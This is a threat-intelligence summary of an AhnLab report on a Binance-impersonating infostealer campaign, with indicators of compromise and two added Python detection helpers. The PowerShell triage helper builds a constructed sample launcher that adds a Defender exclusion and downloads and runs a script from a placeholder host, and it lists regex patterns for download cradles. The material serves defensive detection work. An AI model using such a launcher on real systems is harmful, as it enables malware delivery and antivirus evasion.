AhnLab Security Intelligence Center (ASEC) uncovered malware distributed via Facebook ads targeting cryptocurrency users by impersonating a Binance exchange website. The malware installs via an “installer.msi” file, opens a local listening port, communicates with a command and control server, and executes an Infostealer to collect sensitive system and browser data. #Binance #FacebookAdsMalware #Infostealer
Keypoints
- Malware is distributed through Facebook ads disguised as the Binance cryptocurrency exchange website.
- Users who download and run the “installer.msi” file unknowingly install malware that opens a listening port on the local host, TCP 30303; JavaScript loaded by the disguised website reaches the implant through this port.
- Requests to that port carry specific parameters; the malware uses them to query registry GUIDs and to collect system information with WMI queries supplied by the server.
- If that information shows the host is not a virtual machine, the server registers a scheduled task whose event trigger runs a BASE64-encoded PowerShell script that downloads further malicious scripts.
- The PowerShell scripts add scan exclusions in Windows Defender and then download additional payloads from external domains.
- The final Infostealer collects browser and Telegram data and also performs keylogging.
- Security firms Bitdefender and WithSecure have also reported on this attack campaign.
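Detection logic for the local-listener behaviour described in the keypoints, added here as an example and not code from the ASEC report. It runs over constructed connection records in a simplified schema loosely modelled on Sysmon Event ID 3 (network connection), where `initiated` is true when the logged process opened the connection and false when it accepted it; the paths, PIDs and ephemeral ports are invented, and only the port number 30303 comes from the report. It flags browser connections to loopback port 30303 and pairs each with the process that accepted it.

```python
"""Hunt for the implant's local listener on TCP 30303 and the browser
connections that reach it.  SAMPLE_EVENTS is constructed for this example
(schema loosely modelled on Sysmon Event ID 3); paths, PIDs and ephemeral
ports are invented, only port 30303 comes from the report."""
from ipaddress import ip_address

LISTENER_PORT = 30303
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}

SAMPLE_EVENTS = [
    # The browser tab running the disguised site's JavaScript talks to the local port.
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "initiated": True, "local_ip": "127.0.0.1", "local_port": 51322,
     "remote_ip": "127.0.0.1", "remote_port": 30303},
    # The implant accepting that connection on its listener (hypothetical path).
    {"pid": 7788, "image": r"C:\Users\victim\AppData\Roaming\BinanceDesktop\svc.exe",
     "initiated": False, "local_ip": "127.0.0.1", "local_port": 30303,
     "remote_ip": "127.0.0.1", "remote_port": 51322},
    # Ordinary outbound HTTPS from the same browser: must not be flagged.
    {"pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "initiated": True, "local_ip": "10.0.0.5", "local_port": 51330,
     "remote_ip": "142.250.74.78", "remote_port": 443},
    # A benign loopback service on another port: must not be flagged either.
    {"pid": 3011, "image": r"C:\Users\victim\AppData\Local\Programs\Python\python.exe",
     "initiated": False, "local_ip": "127.0.0.1", "local_port": 8000,
     "remote_ip": "127.0.0.1", "remote_port": 51400},
]


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def hunt(events, port=LISTENER_PORT):
    """Return one finding per event that touches the listener port.

    'peer_port' is the browser's ephemeral port; it appears on both sides of
    one connection, so the two findings for that connection can be paired."""
    findings = []
    for e in events:
        name = basename(e["image"])
        if (e["initiated"] and e["remote_port"] == port
                and ip_address(e["remote_ip"]).is_loopback):
            kind = "browser_to_listener" if name in BROWSERS else "process_to_listener"
            findings.append({"kind": kind, "pid": e["pid"], "image": name,
                             "peer_port": e["local_port"]})
        elif not e["initiated"] and e["local_port"] == port:
            findings.append({"kind": "listener_accept", "pid": e["pid"], "image": name,
                             "peer_port": e["remote_port"]})
    return findings


def listener_pids(events, port=LISTENER_PORT):
    """PIDs that accepted connections on the listener port: the processes to triage."""
    return sorted({f["pid"] for f in hunt(events, port) if f["kind"] == "listener_accept"})


def correlate(events, port=LISTENER_PORT):
    """Pair each browser-side connection with the process that accepted it."""
    findings = hunt(events, port)
    accepts = {f["peer_port"]: f for f in findings if f["kind"] == "listener_accept"}
    pairs = []
    for f in findings:
        if f["kind"] == "browser_to_listener" and f["peer_port"] in accepts:
            a = accepts[f["peer_port"]]
            pairs.append((f["image"], f["pid"], a["image"], a["pid"]))
    return pairs


if __name__ == "__main__":
    for pair in correlate(SAMPLE_EVENTS):
        print("browser %s (pid %d) -> listener %s (pid %d)" % pair)
    print("listener PIDs:", listener_pids(SAMPLE_EVENTS))
```

On a live host the same question is answered directly with `Get-NetTCPConnection -LocalPort 30303 -State Listen` (the `OwningProcess` field gives the PID) or `netstat -ano`; the point of the record-based version is that it works on collected telemetry after the fact and ties the browser to the listener.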
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The malware executes PowerShell scripts encoded in BASE64 to download and run additional payloads (‘events in the “Application” log trigger the execution of a PowerShell script encoded in BASE64’).
- [T1113] Screen Capture – The Infostealer captures screen information from the victim’s system (‘Infostealer that collects system information, screen captures, and browser information’).
- [T1005] Data from Local System – Collects system information using WMI queries sent from the server (‘the server responds with a WMI query that retrieves system information’).
- [T1071] Application Layer Protocol – The malware communicates with the command and control server over HTTP; the requests, carrying parameters such as /r and /worker, originate from JavaScript loaded by the disguised website and reach the implant on local port 30303 (‘communication with a JavaScript loaded on the disguised website…’).
- [T1140] Deobfuscate/Decode Files or Information – The PowerShell stages are delivered BASE64-encoded and decoded on the host before they run, so the plaintext script never appears in the task definition or on the command line (‘PowerShell script encoded in BASE64’).
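A triage helper for the T1059/T1140 entries above and for the Defender-exclusion and download step in the keypoints, added here as an example and not code from the ASEC report. It decodes a BASE64 `-EncodedCommand` PowerShell launcher taken from a process command line or scheduled-task action (UTF-16LE under the Base64, as PowerShell expects), then flags Windows Defender exclusion changes, download cradles and in-memory execution, and lists the URLs defanged. The command lines are constructed for this example and the URL host is a `.invalid` placeholder, not one of the report's domains.

```python
"""Decode -EncodedCommand PowerShell and flag Defender exclusions and
download cradles.  SAMPLE_SCRIPT / SAMPLE_CMDLINES are constructed for this
example; the URL host is a placeholder, not a domain from the report."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual spellings.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)

INDICATORS = {
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s[^\n;|]*-Exclusion(?:Path|Process|Extension)", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
        r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def encode_powershell(script):
    """What the attacker does: UTF-16LE, then Base64.  Used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)      # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not Base64, or not UTF-16LE underneath
        return None


def defang(url):
    """hxxps://host[.]tld/path, so the indicator cannot be clicked by accident."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def classify(script):
    """Name the behaviours present in a (decoded) script and list its URLs, defanged."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"indicators": hits, "urls": [defang(u) for u in URL_RE.findall(script)]}


def triage(cmdlines):
    """One record per command line showing at least one indicator; -EncodedCommand
    is decoded first so the encoding alone does not hide the behaviour."""
    out = []
    for cmd in cmdlines:
        decoded = decode_encoded_command(cmd)
        script = decoded if decoded is not None else cmd
        verdict = classify(script)
        if verdict["indicators"]:
            out.append({"cmdline": cmd, "encoded": decoded is not None,
                        "script": script, **verdict})
    return out


# Constructed samples: one encoded malicious launcher, one ordinary admin script.
SAMPLE_SCRIPT = ('Add-MpPreference -ExclusionPath "$env:APPDATA\\svc"; '
                 "(New-Object Net.WebClient).DownloadString("
                 "'https://cdn.example.invalid/stage2.ps1') | IEX")
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_powershell(SAMPLE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_CMDLINES):
        print(rec["indicators"], rec["urls"])
        print(rec["script"])
```

Feed it the `Arguments` of scheduled-task actions (`schtasks /query /xml` or `Get-ScheduledTask | Select -Expand Actions`) or the command lines from process-creation events; a hit on `defender_exclusion` is worth confirming against `Get-MpPreference` and Defender operational event 5007, which records exclusion changes.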
Indicators of Compromise
- [File Hash] MD5 hashes of malicious installer files – 02c88f8b926d91ac248276fa629b75c2, 07997692c2129a707adb0d5b0b342aad, and 3 more hashes.
- [Domain] Malicious domains used for command and control and payload downloads – binance-downloaad[.]com, binance[.]desktop-windows-pc[.]com, and additional related domains.
- [File Name] Installer file name used for malware distribution – installer.msi.
Read more: https://asec.ahnlab.com/en/89383/